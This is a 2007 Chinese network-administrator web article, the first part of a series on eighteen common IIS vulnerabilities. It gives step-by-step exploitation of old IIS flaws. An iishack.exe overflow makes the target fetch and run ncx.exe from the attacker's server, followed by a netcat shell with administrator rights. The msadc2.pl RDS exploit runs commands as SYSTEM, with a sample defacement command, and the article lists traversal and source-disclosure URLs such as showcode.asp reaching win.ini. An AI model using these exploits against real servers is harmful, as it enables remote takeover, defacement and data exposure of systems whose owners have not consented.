用户名:密 码:验证码 我要投稿 电脑技巧 信息订阅 高级搜索 网站地图 加入收藏
中国网管站 中国网管站发展目标  
我要学→
当前位置:中国网管站首页>高级网管>网吧安全技术>文章内容

了解网管必知:IIS中常见的十八个安全漏洞(1)

来源:yesky.com 作者: 发布时间:2007-12-02  (阅读次数:)  查看更多关于: 网管 IIS 安全漏洞 的文章
1. iis4hack缓冲溢出

  主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序 在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到下面 的站点www.technotronic.com去下载,另外你还需要一台自己的WEB服务器。你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下,然后使用iishack.exe来检查目标机器:

  c:>iishack.exe 80 /ncx.exe

  然后你就使用netcat来连接你要检测的服务器:

  c:>nc 80

  如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。利用程序见iis4hack.zip

  2.msadc

  IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下, 它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。利用程序为msadc2.pl,我们看看它的help

  [quack@chat quack]$ perl msadc2.pl -h

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

  Usage: msadc.pl -h { -d -X -v }

  -h = host you want to scan (ip or domain)

  -d = delay between calls, default 1 second

  -X = dump Index Server path table, if available

  -N = query VbBusObj for NetBIOS name

  -V = use VbBusObj instead of ActiveDataFactory

  -v = verbose

  -e = external dictionary file for step 5

  -u <\hostsharefile> = use UNC file

  -w = Windows 95 instead of Windows NT

  -c = v1 compatibility (three step query)

  -s = run only step

  Or a -R will resume a (v2) command session

  [quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

  Type the command line you want to run (cmd /c assumed):

  cmd /c

  如果出现cmd /c后,直接键入命令行,就可以以system权限执行命令了。比如xundi教的:

  echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

  3.Codebrws.asp

 

  察看文件源代码

  http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

  4.Showcode.asp

  察看文件源代码

  http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

  5.Null.htw

  察看文件源代码

  http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full


上一篇:广州网吧初露转移端倪(3)   下一篇:网管必知:IIS
[收藏] [推荐] [返回顶部][打印本页] [关闭窗口]  
  相关文章
·网管必知:IIS
·网管必知:IIS中常见的十八个安
·网管必知:IIS中常见的十八个安
·网管必知:IIS中常见的十八个安
·网吧服务器RAID 0+1硬盘阵列组建
·网吧服务器RAID 0+1硬盘阵列组建
·学习网吧管理的漏洞及其防范
·教你如何鉴别硬件防火墙性能的差
·学习怎样保护好局域网中的IP地址
·网管必知:防火墙应用八项实用技
·网管注意:MySQL服务器程序又现
·学习虚拟主机安全配置方法
·学习虚拟主机安全配置方法(2)
·学习防范伪装成可信IP地址的攻击
·学习验证码的破解(1)
·学习Microsoft Windows TCP/IP报
·了解:McAfee E-Business Server
·学习OpenBSD rtlabel_id2name()
·克隆恢复技术介绍
·防火墙后的身份验证
  热点文章
·DeepFreeze冰点还原精灵使用图解
·如何用命令查看arp病毒主机
·怎么突破网吧限制
·学会用Sniffer和ARP分析网络问题
·网吧ARP欺骗到局域网的安全管理
·如何解决IP冲突问题
·网吧服务器RAID 0+1硬盘阵列组建
·如何查看网吧网络管理软件的漏洞
·如何恢复BIOS数据
·网吧服务器RAID 0+1硬盘阵列组建
·网吧管理软件万能破解方法
·学习怎样保护好局域网中的IP地址
·破解网吧限制逍遥行
·谈入侵万象网吧服务器
·备份和恢复Oracle数据过程
·了解网络安全入门要了解的问题
·克隆恢复技术介绍
·网管必知:IIS中常见的十八个安
·如何教会客户自己给系统打补丁
·网吧管理软件破解实例讲解
Copyright@2007 中国网管站 All Rights Reserved 陕ICP备07501327号
E-mail:qidian512@163.com 电话:13759975857
编辑负责QQ:347795937 251695990 技术交流群:45212068